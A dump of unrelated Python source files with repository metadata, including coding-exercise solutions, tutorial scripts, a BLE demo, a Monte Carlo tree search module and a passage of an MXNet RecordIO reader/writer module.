print("All perfect numbers up to %d are : " % n)
perfects_up_to(n)
main()
|
[
"emil.dekeyser@student.ucll.be"
] |
emil.dekeyser@student.ucll.be
|
5ea85b5d4ab127194e35ce410732ed286cdba869
|
0c7f3810d822595b55f70f2c9d87f5f2c98054e6
|
/fondos/download.py
|
01b3cc38e731884bfa1e9013bb78fd5c1822ae4e
|
[
"MIT"
] |
permissive
|
elsonidoq/fondos
|
c1b406ed85c1499546352bb704ad4c12dea78f6c
|
7d673865b929da6aba0757962e7d287c82edb1b6
|
refs/heads/master
| 2021-04-29T02:06:47.748040
| 2017-05-20T18:32:23
| 2017-05-20T18:32:23
| 78,062,720
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 373
|
py
|
import os
from datetime import datetime
from invertironline import InvertirOnlineDownloader
here = os.path.abspath(os.path.dirname(__file__))
def main():
bonds = [
'aa17',
'ay24'
]
print "Downloading {}".format(datetime.now())
for bond in bonds:
InvertirOnlineDownloader(bond).execute()
if __name__ == '__main__':
main()
|
[
"elsonidoq@gmail.com"
] |
elsonidoq@gmail.com
|
501c95b652f857f01708a965721f3e01f47337a9
|
f07b7f546278c86ec91fe9fdacbe4acc266b5ef0
|
/blog/blog/wvenv/Lib/site-packages/pyls/_version.py
|
1da11f8698d1b8e9027b628af4386644dc9ed2ca
|
[] |
no_license
|
CankayaUniversity/ceng-407-408-2019-2020-Patent-Comparison-System
|
0386a6d8651a9ce875a9cf56013c19d8242204c9
|
d9c0f2d84d90932b962a0618b01652f3bd560f25
|
refs/heads/master
| 2020-08-18T09:55:23.676188
| 2020-06-27T21:19:20
| 2020-06-27T21:19:20
| 215,772,427
| 2
| 4
| null | 2020-06-27T21:26:31
| 2019-10-17T11:08:50
| null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
# This file was generated by 'versioneer.py' (0.18) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
version_json = '''
{
"date": "2020-01-21T17:27:49+0000",
"dirty": false,
"error": null,
"full-revisionid": "fc2ab66c5e447fb5fbd5941bfc9e070906689969",
"version": "0.31.7"
}
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
|
[
"33146580+celkansimay@users.noreply.github.com"
] |
33146580+celkansimay@users.noreply.github.com
|
44f7d5e6d9055b7acb7c3147d5e6aa735fc3ce3e
|
a09e70355b756bd5cba55246e17eb0480af6257b
|
/examples/ble_demo_central.py
|
eb56a9cb9b54270e50eb0709aed3104e43dfecc4
|
[
"MIT"
] |
permissive
|
devoh747/Adafruit_CircuitPython_BLE
|
9735381dc3481661af54ac32d89ec40e006edc5b
|
7566483e2dbdb1bf6c71d5629a2ed37b113c7cff
|
refs/heads/master
| 2020-08-09T04:14:59.774817
| 2019-10-10T21:11:07
| 2019-10-10T21:11:07
| 213,995,226
| 0
| 0
|
MIT
| 2019-10-09T18:33:32
| 2019-10-09T18:33:32
| null |
UTF-8
|
Python
| false
| false
| 1,319
|
py
|
"""
Demonstration of a Bluefruit BLE Central. Connects to the first BLE UART peripheral it finds.
Sends Bluefruit ColorPackets, read from three potentiometers, to the peripheral.
"""
import time
import board
from analogio import AnalogIn
#from adafruit_bluefruit_connect.packet import Packet
# Only the packet classes that are imported will be known to Packet.
from adafruit_bluefruit_connect.color_packet import ColorPacket
from adafruit_ble.scanner import Scanner
from adafruit_ble.uart_client import UARTClient
def scale(value):
"""Scale an value from 0-65535 (AnalogIn range) to 0-255 (RGB range)"""
return int(value / 65535 * 255)
scanner = Scanner()
uart_client = UARTClient()
a3 = AnalogIn(board.A3)
a4 = AnalogIn(board.A4)
a5 = AnalogIn(board.A5)
while True:
uart_addresses = []
# Keep trying to find a UART peripheral
while not uart_addresses:
uart_addresses = uart_client.scan(scanner)
uart_client.connect(uart_addresses[0], 5)
while uart_client.connected:
r = scale(a3.value)
g = scale(a4.value)
b = scale(a5.value)
color = (r, g, b)
print(color)
color_packet = ColorPacket(color)
try:
uart_client.write(color_packet.to_bytes())
except OSError:
pass
time.sleep(0.3)
|
[
"halbert@halwitz.org"
] |
halbert@halwitz.org
|
a34b60332da3cc2b916a9aa39e89a5d34abc28c3
|
59527a2f36edfec1cb3a06cd93864555d62cd7eb
|
/PythonCoreProgramming/chapter3/makeTextFile.py
|
c15ae4fa6348f7f662ae3c222006404dae7a182f
|
[] |
no_license
|
xiao2mo/MachineLearningInAction-1
|
e4559fdf54128316e5655f15269f371b687b959a
|
48fb1faa16827cd0fbeac6ae05358e5fdf5f9e90
|
refs/heads/master
| 2021-01-21T21:05:54.175565
| 2017-06-10T05:53:56
| 2017-06-10T05:53:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 660
|
py
|
#coding:utf-8
import os
if __name__ == '__main__':
#获得文件名
while True:
fname = raw_input('Enter file name: ');
if os.path.exists(fname):
print 'file: %s has already existed' %fname
else:
break;
fileContent = []
print '\n Enter file content, if you want quit, type .'
while True:
entry = raw_input('>')
if entry == '.':
break;
else:
fileContent.append(entry)
#将从fileContent写入到文件中去
fw = open(fname, 'w') #以写模式打开
fw.write('\n'.join(fileContent))
fw.flush()
fw.close()
print 'Done!'
|
[
"codercuixin@gmail"
] |
codercuixin@gmail
|
ce9e940c44787a1a33a27df098898d8d46a918ce
|
eb8e13ec2997b6047be54ac9b859ece6f0b9baa3
|
/File_Reading.py
|
c6ca8e2d55ce02d5663653d420de9b8f62e23c18
|
[] |
no_license
|
Zidane786/Learning-Python
|
2a7f1eb2fd80a105afe5f73dc29fbc134f0e1208
|
8038582748263fe905f3412eb9209f1299719bd1
|
refs/heads/master
| 2020-12-06T07:19:39.047544
| 2020-05-02T09:45:57
| 2020-05-02T09:45:57
| 232,387,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,885
|
py
|
# ***Open File and Reading it as text file***:-
# open_file=open("Zidane.txt", 'rt') # In this rt is Default where r is read and t is text
# Read_File=open_file.read()
# print(Read_File)
# open_file.close() # It is good habbit to close the file when work is done Because we need to free Memomy when our work is done
"""
OUTPUT:-
Zidane is Great
Zidane is Really Great
Zidane is Really Really Great
Zidane is Really Really Really Great
Zidane is Really Really Really Really Great
"""
# ***Read And Binary*** :-
# open_file1=open("Zidane.txt","rb")
# Read_File1=open_file1.read()
# print(Read_File1) # Give Output in Binary String Form
"""
OUTPUT:-
b'Zidane is Great\nZidane is Really Great\nZidane is Really Really Great\nZidane is Really Really Really Great\nZidane is Really Really Really Really Great'
"""
# ***passing Argument in read functoion***:-
# Open=open("Zidane.txt")
# Read=Open.read(2)
# print(Read)
# Read=Open.read(3)
# print(Read) # pehle jab read mai 2 paas kiya to Zi ho gaya tha ab 3 paas kiya to uske aage se lege i.e dan See Output for better understanding
"""
OUTPUT:-
Zi
dan
"""
# ***If we want to print Content of file line by line we can do by following way***:-
# Open=open("Zidane.txt")
# for line in Open:
# print(line,end="")
"""
OUTPUT:-
Zidane is Great
Zidane is Really Great
Zidane is Really Really Great
Zidane is Really Really Really Great
Zidane is Really Really Really Really Great
"""
# *** readline() Function***:-
# Open=open("Zidane.txt")
# print(Open.readline(),end="") #It read a line agar hame multiple line read kerni hai to isse multiple time read kerna padega readline()=read a single line
# print(Open.readline(),end="") # uske saath new line character bhi read kerta hai isliye hame end="" lagayege
# print(Open.readline(),end="")
# print(Open.readline(),end="")
# print(Open.readline(),end="")
"""
OUTPUT:-
Zidane is Great
Zidane is Really Great
Zidane is Really Really Great
Zidane is Really Really Really Great
Zidane is Really Really Really Really Great
"""
# *** readlines() Function(it create list)***:-
Open=open("Zidane.txt")
print(Open.readlines()) #hamari har line List mai store ho jayegi with new line character
"""
OUTPUT:-
['Zidane is Great\n', 'Zidane is Really Great\n', 'Zidane is Really Really Great\n', 'Zidane is Really Really Really Great\n', 'Zidane is Really Really Really Really Great']
"""
Open.close() #good habbit to close it when work is done
|
[
"noreply@github.com"
] |
Zidane786.noreply@github.com
|
d766d4c5a78e044a4c3b133cff4e77e12c3e4d4f
|
ce7b21a1a9a79322db296a7ffb5dca23c3f53e8d
|
/exam/bin/django-admin.py
|
a5aa180a78eeba16a34a8bf08830073c2cec94ca
|
[] |
no_license
|
letyougo/exam
|
c8f11f25c4d4e2ab18fdbbf853f13939a41a7079
|
a6832790927abf36a80263d4c23efede0976fcc7
|
refs/heads/master
| 2021-08-19T08:16:34.385755
| 2017-11-25T12:12:40
| 2017-11-25T12:12:40
| 112,000,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
#!/Users/xiaoxiaosu/Documents/miui-2017/exam/exam/bin/python3.5
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
[
"surui1@xiaomi.com"
] |
surui1@xiaomi.com
|
f17669184ef2e9e58cc9613ffd6e8add89126ea3
|
09e8c92187ff8d7a726727041e2dd80850dcce3d
|
/leetcode/028_implement_strStr_TRICKY.py
|
7154dcc9281455ccd29a545cb11042da6c8c43ad
|
[] |
no_license
|
kakru/puzzles
|
6dd72bd0585f526e75d026f3ba2446b0c14f60e0
|
b91bdf0e68605f7e517446f8a00b1e0f1897c24d
|
refs/heads/master
| 2020-04-09T09:47:31.341475
| 2019-05-03T21:24:41
| 2019-05-03T21:24:41
| 160,246,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,846
|
py
|
#/usr/bin/env python3
import unittest
class Solution:
def strStr(self, haystack, needle):
"""
:type haystack: str
:type needle: str
:rtype: int
"""
h_len = len(haystack)
n_len = len(needle)
i = 0
while i <= h_len - n_len:
if haystack[i:i+n_len] == needle:
return i
i += 1
return -1
#
# There is a problem with a step by step solution it's easy to forget about:
# haystack="mississippi", needle="issippi"
# mississippi
# issippi --> X
# mississippi
# issippi --> OK
# the loop index on the haystack cannot go back to 0 !!
class BasicTest(unittest.TestCase):
def test_1(self):
input_ = "hello", "ll"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_2(self):
input_ = "helo", "ll"
expected_output = -1
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_3(self):
input_ = "abc", ""
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_4(self):
input_ = "abc"*100000, "cab"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_5(self):
input_ = "a", "a"
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_6(self):
input_ = "mississippi", "issippi"
expected_output = 4
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
[
"karol@kruzelecki.com"
] |
karol@kruzelecki.com
|
d8068915b32c07cb896a8397d6b917f876d3b5fe
|
4549c02dac55f2b8ed113ddacf95264630d91698
|
/Predict/__init__.py
|
022ca012e6428d9d89aadfa04b3b27bb059bca6b
|
[] |
no_license
|
kiminh/GPA
|
43077bb59797a096e3660b226642c5fe091a9663
|
29c5ffd8d7aa1bc3ebe6d83d1e55a997a04e4b60
|
refs/heads/master
| 2021-02-10T20:45:35.581410
| 2020-01-14T08:59:00
| 2020-01-14T08:59:00
| 244,417,955
| 1
| 0
| null | 2020-03-02T16:23:00
| 2020-03-02T16:23:00
| null |
UTF-8
|
Python
| false
| false
| 98
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2019/11/19 10:58
# @Author : zxl
# @FileName: __init__.py.py
|
[
"791057615@qq.com"
] |
791057615@qq.com
|
d8b19ae42d91ddaf031dcf7c3a036edde31b414e
|
41aa400850af639e8d2ef4da7c65a566e3ff5a54
|
/Object_Oriented_Programs/Inventory_data.py
|
2696c04edc2fe332e64355e2774c02d351a90c2e
|
[] |
no_license
|
ravindraindia4u/Python
|
e1159df5eeea6b93ad42063644eaca375ca96f72
|
b1915958a524f4f2e6b80cff423cd7bc72834fa8
|
refs/heads/master
| 2022-04-27T17:45:35.653000
| 2020-05-01T21:15:30
| 2020-05-01T21:15:30
| 259,142,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
"""
Create the JSON from Inventory Object and output the JSON String
"""
import json
def main():
file = open("inventory", 'r')
data = json.load(file)
file.close()
for key, value in data.items():
print(f"The {key} details are as follows: ")
for dictionary in value:
for keys, values in dictionary.items():
print(f"\t\t{keys} : {values}")
print()
main()
|
[
"ravindraindia4u@gmail.com"
] |
ravindraindia4u@gmail.com
|
095d0bb99bf369d801675140f71509f3c30b20fc
|
2c28ecef182aab6f57f8ca1195aca33ae5061cc4
|
/AutomateTheBoringStuff/commaCode.py
|
574ce040aa387c04db5862594c8eb0149a52b47c
|
[] |
no_license
|
MarcHiggins/LearningPython
|
b5b39ec80b1f6959bf24d55cb5c86200ab82fd67
|
dba2fac74b37ac0038b109c00720a71c0b57109b
|
refs/heads/master
| 2022-09-17T22:04:55.753942
| 2020-06-05T18:10:03
| 2020-06-05T18:10:03
| 267,947,875
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 547
|
py
|
##Aim is to print a list with all items separated with a comma
## and a space, with and inserted before the last item
##Test one with a simple, user defined list
spam = ['apples', 'bananas', 'tofu', 'cats']
print(spam)
def andlist(x):
x.insert(-1, 'and')
print(*x, sep = ", ")
andlist(spam)
print(*spam)
## Test two: generate a long list and call the function on this
import random
randomDNA = []
dna = ["A", "T", "G", "C"]
for i in range (0,100):
randomDNA +=random.choice(dna)
print(randomDNA)
andlist(randomDNA)
|
[
"marcghiggins@gmail.com"
] |
marcghiggins@gmail.com
|
a9d884d274c01dd78cceab6370265d03f5fafe07
|
c7ab842b33195cf026b3a93ef38814ce3ea6309e
|
/Reed-Solomon/main.py
|
aff0b3b81d06e0755c525ab2998b20c8cff029d5
|
[] |
no_license
|
kizcko/Number-Theory
|
7f2429d7d1685b38338073f6603bce91e51106a5
|
aed1dba7a06a91eb0341d4fdc0bf1577d0809bc3
|
refs/heads/main
| 2023-04-20T18:55:06.584995
| 2021-05-17T15:09:59
| 2021-05-17T15:09:59
| 368,226,516
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 509
|
py
|
import decoding
from encoding import encoding
from decoding import *
m = 29
p = 11
s = 1
k = 3
def convert_to_ascii(text):
return "".join(str(ord(char)) for char in text)
if isinstance(m, str):
m = int(convert_to_ascii(m))
def main(m,p,s,k):
print("\nEncoding\n",20*'=')
print('\nm:', m)
initial = encoding(m, p, s, k)
print("\n\nDecoding\n", 20 * '=')
z = generate_z(initial,p)
print("\nZ:",z)
polynomial(p, z, k,s,initial)
main(m,p,s,k)
|
[
"noreply@github.com"
] |
kizcko.noreply@github.com
|
15f12151f6b78ab44e92344a457d76919163a256
|
e2af805086a86ec5e3526c503e56aacf291bff7d
|
/pv_mcts.pyx
|
f6cb74e6357e7d2dcb9361b56fee7187c63aed81
|
[] |
no_license
|
keisuke-777/CythonVerAlphaZeroForGeister
|
e21c7e44e83f58e63b4ae35487deba6d75b9b4cc
|
abf9b124fc2d335cf6086a98223d60883719cfc9
|
refs/heads/master
| 2023-03-22T11:33:05.838507
| 2021-03-10T02:21:48
| 2021-03-10T02:21:48
| 315,944,517
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,206
|
pyx
|
# ====================
# モンテカルロ木探索の作成
# ====================
# パッケージのインポート
from game import State
from dual_network import DN_INPUT_SHAPE
from math import sqrt
from tensorflow.keras.models import load_model
from pathlib import Path
import numpy as np
# パラメータの準備
PV_EVALUATE_COUNT = 50 # 1推論あたりのシミュレーション回数
# 推論
def predict(model, state):
# 推論のための入力データのシェイプの変換
a, b, c = DN_INPUT_SHAPE
x = np.array(state.pieces_array())
x = x.reshape(c, a, b).transpose(1, 2, 0).reshape(1, a, b, c)
# 推論
y = model.predict(x, batch_size=1)
# 方策の取得
policies = y[0][0][list(state.legal_actions())] # 合法手のみ
policies /= sum(policies) if sum(policies) else 1 # 合計1の確率分布に変換
# 価値の取得
value = y[1][0][0]
return policies, value
# ノードのリストを試行回数のリストに変換
def nodes_to_scores(nodes):
scores = []
for c in nodes:
scores.append(c.n)
return scores
# モンテカルロ木探索のスコアの取得
def pv_mcts_scores(model, state, temperature):
# モンテカルロ木探索のノードの定義
class Node:
# ノードの初期化
def __init__(self, state, p):
self.state = state # 状態
self.p = p # 方策
self.w = 0 # 累計価値
self.n = 0 # 試行回数
self.child_nodes = None # 子ノード群
# 局面の価値の計算
def evaluate(self):
# ゲーム終了時
if self.state.is_done():
# 勝敗結果で価値を取得
value = -1 # 負けも引き分けも-1(要調整)
# value = -1 if self.state.is_lose() else 0
# 累計価値と試行回数の更新
self.w += value
self.n += 1
return value
# 子ノードが存在しない時
if not self.child_nodes:
# ニューラルネットワークの推論で方策と価値を取得
policies, value = predict(model, self.state)
# 累計価値と試行回数の更新
self.w += value
self.n += 1
# 子ノードの展開
self.child_nodes = []
for action, policy in zip(self.state.legal_actions(), policies):
self.child_nodes.append(Node(self.state.next(action), policy))
return value
# 子ノードが存在する時
else:
# アーク評価値が最大の子ノードの評価で価値を取得
value = -self.next_child_node().evaluate()
# 累計価値と試行回数の更新
self.w += value
self.n += 1
return value
# アーク評価値が最大の子ノードを取得
def next_child_node(self):
# アーク評価値の計算
C_PUCT = 1.0
t = sum(nodes_to_scores(self.child_nodes))
pucb_values = []
for child_node in self.child_nodes:
pucb_values.append(
(-child_node.w / child_node.n if child_node.n else 0.0)
+ C_PUCT * child_node.p * sqrt(t) / (1 + child_node.n)
)
# アーク評価値が最大の子ノードを返す
return self.child_nodes[np.argmax(pucb_values)]
# 現在の局面のノードの作成
root_node = Node(state, 0)
# 複数回の評価の実行
for _ in range(PV_EVALUATE_COUNT):
root_node.evaluate()
# 合法手の確率分布
scores = nodes_to_scores(root_node.child_nodes)
if temperature == 0: # 最大値のみ1
action = np.argmax(scores)
scores = np.zeros(len(scores))
scores[action] = 1
else: # ボルツマン分布でバラつき付加
scores = boltzman(scores, temperature)
return scores
# モンテカルロ木探索で行動選択
def pv_mcts_action(model, temperature=0):
def pv_mcts_action(state):
scores = pv_mcts_scores(model, state, temperature)
return np.random.choice(state.legal_actions(), p=scores)
return pv_mcts_action
# ボルツマン分布
def boltzman(xs, temperature):
xs = [x ** (1 / temperature) for x in xs]
return [x / sum(xs) for x in xs]
# 動作確認
if __name__ == "__main__":
# モデルの読み込み
path = sorted(Path("./model").glob("*.h5"))[-1]
model = load_model(str(path))
# 状態の生成
state = State()
# モンテカルロ木探索で行動取得を行う関数の生成
next_action = pv_mcts_action(model, 1.0)
# ゲーム終了までループ
while True:
# ゲーム終了時
if state.is_done():
break
# 行動の取得
action = next_action(state)
# 次の状態の取得
state = state.next(action)
# 文字列表示
print(state)
|
[
"keisuke7771120@me.com"
] |
keisuke7771120@me.com
|
ea641622136b336a1f7196b18e51f101df6df097
|
d45bb44b0dfabfeff37c21a6ac0be1362782e39a
|
/utils/import_bookmarks.py
|
ea763b006243bdea76577f71ce07e8fba1168997
|
[] |
no_license
|
SyJarvis/BookmarkManager
|
c25f9df8cb0d0719de805f8080a7ae78c5ac529c
|
dc3baf06fd47c4514b148134ee3d3fa03f7f1571
|
refs/heads/master
| 2023-03-26T17:14:17.776441
| 2021-03-21T14:58:58
| 2021-03-21T14:58:58
| 322,634,112
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from pyquery import PyQuery as pq
class BookmarksTodb():
def __init__(self, filename='utils/bookmarks_2020_5_5_win.html'):
with open(filename, 'r+', encoding='utf-8') as file:
self.html = file.read()
self.doc = pq(self.html)
def get_cage_list(self):
cage_li = []
items = self.doc('H3')
for cage in items:
cage_li.append(cage.text)
return cage_li
def get_url_list(self):
lis = self.doc('A').items()
datas = []
for li in lis:
url_params = {}
url_params['url'] = li.attr('href')
url_params['title'] = li.text()
print(url_params)
datas.append(url_params)
return datas
|
[
"1755115828@qq.com"
] |
1755115828@qq.com
|
26abf2b58ee4ed7a69f2c069c5026e46fd6d5427
|
419873dd3b7412f704b1a7907b64a60b44cedf39
|
/python/树/103. 二叉树的锯齿形层次遍历.py
|
b3b9739640c5bbaeecf8e7c3f913e970275761a9
|
[] |
no_license
|
Weless/leetcode
|
0585c5bfa260713f44dabc51fa58ebf8a10e7814
|
0566622daa5849f7deb0cfdc6de2282fb3127f4c
|
refs/heads/master
| 2021-11-13T07:59:20.299920
| 2021-10-25T02:09:53
| 2021-10-25T02:09:53
| 203,720,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 818
|
py
|
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
from typing import List
class Solution:
def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
from collections import deque
queue = deque()
queue.append(root)
res = []
level = 1
while queue:
tmp = []
for _ in range(len(queue)):
node = queue.popleft()
tmp.append(node.val)
if node.left: queue.append(node.left)
if node.right: queue.append(node.right)
if level % 2 == 0:
res.append(tmp[::-1])
else:
res.append(tmp)
level += 1
return res
|
[
"twzcxx1@163.com"
] |
twzcxx1@163.com
|
d73cb9b3bb88001eb961512b064822c5c3bc29b3
|
2214265044a4c141b9743e74cb04b87a2d08ce5a
|
/luminoth/utils/homedir.py
|
1e4a8098a8f7488ac2171c99c76ffa474d329f7c
|
[
"BSD-3-Clause"
] |
permissive
|
Chunde/luminoth
|
163bb4850d9526675e5e02414b07055a894cb794
|
4c1523460d41a69dc548262051779dc5037afb8d
|
refs/heads/master
| 2021-04-27T02:39:30.272615
| 2018-03-02T18:04:46
| 2018-03-02T18:54:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
"""Luminoth home (~/.luminoth) management utilities."""
import os
import tensorflow as tf
DEFAULT_LUMINOTH_HOME = os.path.expanduser('~/.luminoth')
def get_luminoth_home(create_if_missing=True):
"""Returns Luminoth's homedir."""
# Get Luminoth's home directory (the default one or the overridden).
path = DEFAULT_LUMINOTH_HOME
if 'LUMI_HOME' in os.environ:
path = os.environ['LUMI_HOME']
path = os.path.abspath(path)
# Create the directory if it doesn't exist.
if create_if_missing and not os.path.exists(path):
tf.gfile.MakeDirs(path)
return path
|
[
"aazzinnari@gmail.com"
] |
aazzinnari@gmail.com
|
798e600ffd6cebdf2aa06b2b71741f788ad7e5d9
|
b198f2276f3f26bed9aaae347429875e573a0355
|
/Interview_Coding_Questions/extract_ip.py
|
5f8f784aaec2f3b0fcda2ea23d0eec658ea14071
|
[] |
no_license
|
PKStuff/task
|
c4dedd8d3cd3e34ac203839592e645d112a20ff2
|
36e0ad50aabc398135b98224eb7cca05867aa3eb
|
refs/heads/master
| 2021-06-13T22:22:56.332364
| 2021-02-09T11:57:46
| 2021-02-09T11:57:46
| 136,037,052
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
"""
This is my IP address 10.10.20.189 on network 2020.1.1 and also 192.168.0.1
"""
def extractIP(s1):
s1 = s1.split()
for string in s1:
if string.count('.') == 3:
print(string)
s1 = "This is my IP address 10.10.20.189 on network 2020.1.1 and also 192.168.0.1"
extractIP(s1)
|
[
"noreply@github.com"
] |
PKStuff.noreply@github.com
|
5baa937a803d1bfa2ca8c947fddf74cbd2b9d73b
|
3a218403531ef396e32daccf7f8e7812c9f7e8d2
|
/python/mxnet/seg_recordio.py
|
b2a2beb6c7930fea97fd62c2d0857e160dca47e4
|
[
"BSD-3-Clause",
"Zlib",
"Apache-2.0",
"BSD-2-Clause",
"BSD-2-Clause-Views"
] |
permissive
|
coderzbx/seg-mxnet
|
ac0f9cf450d0b4bebb26110921c83831ca832615
|
a3ef65a1991d59c23b6111048fdc16d38e2862af
|
refs/heads/master
| 2022-11-30T04:09:49.476375
| 2018-05-16T12:50:29
| 2018-05-16T12:50:29
| 127,411,826
| 0
| 1
|
Apache-2.0
| 2022-11-25T01:35:29
| 2018-03-30T09:51:04
|
C++
|
UTF-8
|
Python
| false
| false
| 15,191
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Read and write for the RecordIO data format."""
from __future__ import absolute_import
from collections import namedtuple
import ctypes
import struct
import numbers
import numpy as np
from .base import _LIB
from .base import RecordIOHandle
from .base import check_call
from .base import c_str
try:
import cv2
except ImportError:
cv2 = None
class MXSegRecordIO(object):
"""Reads/writes `RecordIO` data format, supporting sequential read and write.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'w')
<mxnet.recordio.MXSegRecordIO object at 0x10ef40ed0>
>>> for i in range(5):
... record.write('record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(5):
... item = record.read()
... print(item)
record_0
record_1
record_2
record_3
record_4
>>> record.close()
Parameters
----------
uri : string
Path to the record file.
flag : string
'w' for write or 'r' for read.
"""
def __init__(self, uri, flag):
self.uri = c_str(uri)
self.handle = RecordIOHandle()
self.flag = flag
self.is_open = False
self.open()
def open(self):
"""Opens the record file."""
if self.flag == "w":
check_call(_LIB.MXRecordIOWriterCreate(self.uri, ctypes.byref(self.handle)))
self.writable = True
elif self.flag == "r":
check_call(_LIB.MXRecordIOReaderCreate(self.uri, ctypes.byref(self.handle)))
self.writable = False
else:
raise ValueError("Invalid flag %s"%self.flag)
self.is_open = True
def __del__(self):
self.close()
def close(self):
"""Closes the record file."""
if not self.is_open:
return
if self.writable:
check_call(_LIB.MXRecordIOWriterFree(self.handle))
else:
check_call(_LIB.MXRecordIOReaderFree(self.handle))
self.is_open = False
def reset(self):
"""Resets the pointer to first item.
If the record is opened with 'w', this function will truncate the file to empty.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(2):
... item = record.read()
... print(item)
record_0
record_1
>>> record.reset() # Pointer is reset.
>>> print(record.read()) # Started reading from start again.
record_0
>>> record.close()
"""
self.close()
self.open()
def write(self, buf):
"""Inserts a string buffer as a record.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'w')
>>> for i in range(5):
... record.write('record_%d'%i)
>>> record.close()
Parameters
----------
buf : string (python2), bytes (python3)
Buffer to write.
"""
assert self.writable
check_call(_LIB.MXRecordIOWriterWriteRecord(self.handle,
ctypes.c_char_p(buf),
ctypes.c_size_t(len(buf))))
def read(self):
"""Returns record as a string.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(5):
... item = record.read()
... print(item)
record_0
record_1
record_2
record_3
record_4
>>> record.close()
Returns
----------
buf : string
Buffer read.
"""
assert not self.writable
buf = ctypes.c_char_p()
size = ctypes.c_size_t()
check_call(_LIB.MXRecordIOReaderReadRecord(self.handle,
ctypes.byref(buf),
ctypes.byref(size)))
if buf:
buf = ctypes.cast(buf, ctypes.POINTER(ctypes.c_char*size.value))
return buf.contents.raw
else:
return None
class MXIndexedSegRecordIO(MXSegRecordIO):
"""Reads/writes `RecordIO` data format, supporting random access.
Example usage:
----------
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'r')
>>> record.read_idx(3)
record_3
Parameters
----------
idx_path : str
Path to the index file.
uri : str
Path to the record file. Only supports seekable file types.
flag : str
'w' for write or 'r' for read.
key_type : type
Data type for keys.
"""
def __init__(self, idx_path, uri, flag, key_type=int):
self.idx_path = idx_path
self.idx = {}
self.keys = []
self.key_type = key_type
self.fidx = None
super(MXIndexedSegRecordIO, self).__init__(uri, flag)
def open(self):
super(MXIndexedSegRecordIO, self).open()
self.idx = {}
self.keys = []
self.fidx = open(self.idx_path, self.flag)
if not self.writable:
for line in iter(self.fidx.readline, ''):
line = line.strip().split('\t')
key = self.key_type(line[0])
self.idx[key] = int(line[1])
self.keys.append(key)
def close(self):
"""Closes the record file."""
if not self.is_open:
return
super(MXIndexedSegRecordIO, self).close()
self.fidx.close()
def seek(self, idx):
"""Sets the current read pointer position.
This function is internally called by `read_idx(idx)` to find the current
reader pointer position. It doesn't return anything."""
assert not self.writable
pos = ctypes.c_size_t(self.idx[idx])
check_call(_LIB.MXRecordIOReaderSeek(self.handle, pos))
def tell(self):
"""Returns the current position of write head.
Example usage:
----------
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'w')
>>> print(record.tell())
0
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
... print(record.tell())
16
32
48
64
80
"""
assert self.writable
pos = ctypes.c_size_t()
check_call(_LIB.MXRecordIOWriterTell(self.handle, ctypes.byref(pos)))
return pos.value
def read_idx(self, idx):
"""Returns the record at given index.
Example usage:
----------
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'w')
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'r')
>>> record.read_idx(3)
record_3
"""
self.seek(idx)
return self.read()
def write_idx(self, idx, buf):
"""Inserts input record at given index.
Example usage:
----------
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
Parameters
